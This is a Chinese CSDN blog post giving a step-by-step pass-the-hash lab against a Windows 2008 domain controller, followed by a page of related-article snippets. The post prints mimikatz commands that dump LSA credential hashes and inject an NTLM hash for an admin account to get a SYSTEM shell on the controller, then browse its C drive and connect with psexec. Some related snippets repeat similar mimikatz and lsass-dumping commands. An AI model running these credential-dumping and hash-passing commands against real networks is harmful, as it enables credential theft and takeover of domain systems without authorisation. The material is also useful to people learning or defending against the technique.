域渗透之pth hash传递攻击

最新推荐文章于 2022-12-09 10:19:53 发布
最新推荐文章于 2022-12-09 10:19:53 发布
阅读量1w 收藏 2
点赞数
文章标签: 哈希算法 安全 算法 测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45612728/article/details/122792761
版权

当你拿到了一台服务器的权限,然后使用mimikatz进行读取hash也就是密文,读取到了有admin这个账号,接着把账号和hash注入到内存当中,使用mimikatz把hash传递给另外一台服务器,并且打开一个cmd,说得简单一点就是撞他,赌他们是一样hash和账号的.

下面实验分别是一台08域控和一台win7
我们需要通过win7读取hash,然后去撞域控的hash值.

  1. 导出hash
mimikatz.exe "privilege::debug" "lsadump::lsa /patch" exit >>log2.txt

在这里插入图片描述
在这里插入图片描述
2.以admin账号去撞08服务器的hash值
如果攻击成功回返回一个system32的命令窗口给你.

mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:cyh.com /user:admin /ntlm:afffeba176210fad4628f0524bfe1942" exit

在这里插入图片描述
在这里插入图片描述
3.查看一下域控
使用命令net time
在这里插入图片描述
4.查看一下域控的c盘,看看能不能查看,如果能查看就证明通过hash攻击成功.
在这里插入图片描述
5.接下来你就可以通过psexec.exe进行连接域控的cmd.
在这里插入图片描述
在这里插入图片描述

请再坚持一下
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AD渗透 | PTH&PTK哈希传递攻击手法
m0_57221101的博客
04-13 1141
AD渗透的第二篇,托更一下Kerberos协议的分析文章,等到攻击手法研究明白了,再把协议分析放上来,防止像那些理解不明不白的人写的东西一样祸害人。 发生情况 在高版本的windows server下账号密码不再以明文的方式保存,转而以hash的形式储存,但是假如我们在攻击的时候抓取到了用户hash也可以直接用hash来直接通过验证,模拟用户登录 原理 由于验证原理的问题密码是在本地计算成hash,然后使用hash加密时间戳作为pre-Authention-data来上传,因此如果我们使用自己的脚
哈希传递PTH攻击利用
niqiu320的博客
06-01 865
哈希传递PTH攻击利用 环境:kali &win8 privilege::debug sekurlsa::logonpasswords win8中运行: 网上github先下载mimikatz_trunk,下载解压后在x64中打开小猕猴桃 sekurlsa::pth /user:administrator /domain:本机IP /ntlm:7365e3b22baeaebc0411873eedf84390 kali中按下方操作 msf > use exploit/wind
HASH注入攻击
cnbird's blog
12-26 2738
HASH注入攻击
pth(pass the hash)哈希传递攻击
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
10-09 2658
pth(pass-the-hash)哈希传递攻击在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码/工作组环境账号hash内网中存在和当前机器相同的密码(ps:微软打了KB22871997补丁后只有Administrator(SID 500)可以PTH成功,默认windows server 2012后都会存在补丁)
内网渗透-横向smb&wmin明文hash传递
weixin_60329395的博客
08-09 1715
该工具可配合minikatz进行明文获取,minikatz被查杀的情况下可使用tips:该工具为微软官方工具,不会被查杀Procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump下载成功后 导入到目标主机 使用CMD命令进行以下命令进行执行即使用该工具生成一个该主机的密码文件 执行成功,自动生成了一个lsass.dmp的文件 将该dmp文件放到自己本机上使用minikatz进行执行tips:将dmp文件放进min
第68天:内网安全-横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境中,横向PTH、PTK、PTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
GFPGANv1.4.pth
04-30
GFPGANv1.4.pth下载
PTH和NPTH有何区别
01-20
PTH是沉铜孔(Plating Through Hole),孔壁有铜,一般是过电孔(VIA)及元件孔。  NPTH是非沉铜孔(Non Plating Through Hole),孔壁无铜,一般是定位孔及锣丝孔。可用干膜封孔或在电镀前胶粒塞或电镀后二次钻孔或...
faceparsing_79999_iter.pth
09-30
faceparsing_79999_iter.pth,人脸分割faceparsing的预训练模型,PyTorch版本。
GFPGANv1.3.pth
03-24
GFPGANv1.3.pth模型文件 官网:https://github.com/TencentARC/GFPGAN/blob/master/README.md
渗透-横向移动(PTH)
m0_58596609的博客
11-15 2390
一. Windows本地认证 基础知识 Windows内部是不保存明文密码的,只保存密码的hash。 本机用户的密码hash是放在本地的SAM文件 里面,内用户的密码hash是存在控的NTDS.DIT文件里面。 SAM文件位置:%SystemRoot%\system32\config\sam 当我们登录系统的时候,系统会自动地读取SAM文件中的“密码”与我们输入的“密码”进行对比,如果相同,则认证成功。 密码格式 Administrator:500:AAD3B435B51404EEAAD3B4
[转载]HASH注入攻击
blogfeifei
03-02 788
文章作者:pt007[at]vip.sina.com 信息来源:邪恶八进制信息安全团队(www.eviloctal.com)下载网址:http://www.truesec.com/PublicSto ... tectCookieSupport=1 http://forum.eviloctal.com/thread-34966-1-6.htmlTo get a DOS Prompt as NT s...
内网渗透防御:如何防御Hash注入攻击
weixin_33811539的博客
05-13 229
2019独角兽企业重金招聘Python工程师标准>>> ...
内网渗透哈希传递攻击
zzlx123的博客
12-18 1874
条件:获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口打开着,可利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)。(只能是administrator用户的LM-hash和NTLM-hash),这个利用跟工作组环境或者环境无关。 这个网站提供对密码转换成 LM-Hash 和 NTLM...
Mimikatz攻击及防御
weixin_42255372的博客
12-19 739
Mimikatz攻击及防御 Mimikatz的简介:     Mimikatz为法国人Benjamin Delpy编写的一款轻量级的调试工具,在内网渗透过程中,它多数时候是作为一款抓取用户口令的工具。然而Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证、票证传递hash传递、甚至伪造管理凭证令牌。 Mimikatz功能介绍: CRYPTO::Certificates – 列出...
渗透之哈希传递攻击及其原理
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-09 1923
哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。在学习哈希传递攻击之前我们先来了解一下其背后的Windows 底层协议和原理。
hash传递攻击谈相关Windows安全机制
weixin_33998125的博客
08-01 230
前言 path-the-hash,中文直译过来就是hash传递,在中是一种比较常用的攻击方式。在网上所找到的资料,大多数是介绍如何实现此类攻击,但对于它背后所隐藏的关于Windows安全机制的一些知识,却鲜有探讨。本文的目的就是从pass-the-hash这一古老的话题切入,由攻击过程中Windows的行为引出它背后的安全机制,让大家对Windows有...
mimikatz实战渗透抓取控管理员密码
热门推荐
404
02-07 1万+
实验环境: 攻击机:Kali 靶 机:Windows server 2012 工具:mimikatz2.1 这里实验所需要的工具我会上传到我的资源里面,有需要的小伙伴可以自己去下载 条件:靶机获取到shell之后必须是管理员的权限 步骤: **我这里攻击利用的msf里面的regsvr32_applocker_bypass_ser
pth文件
最新发布
05-25
.pth文件是PyTorch中模型的保存格式,它包含了PyTorch模型的权重参数和网络结构等信息。.pth文件可以用来恢复训练好的模型,或者在其他程序中加载已经训练好的模型,进行预测或fine-tuning等操作。 在PyTorch中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值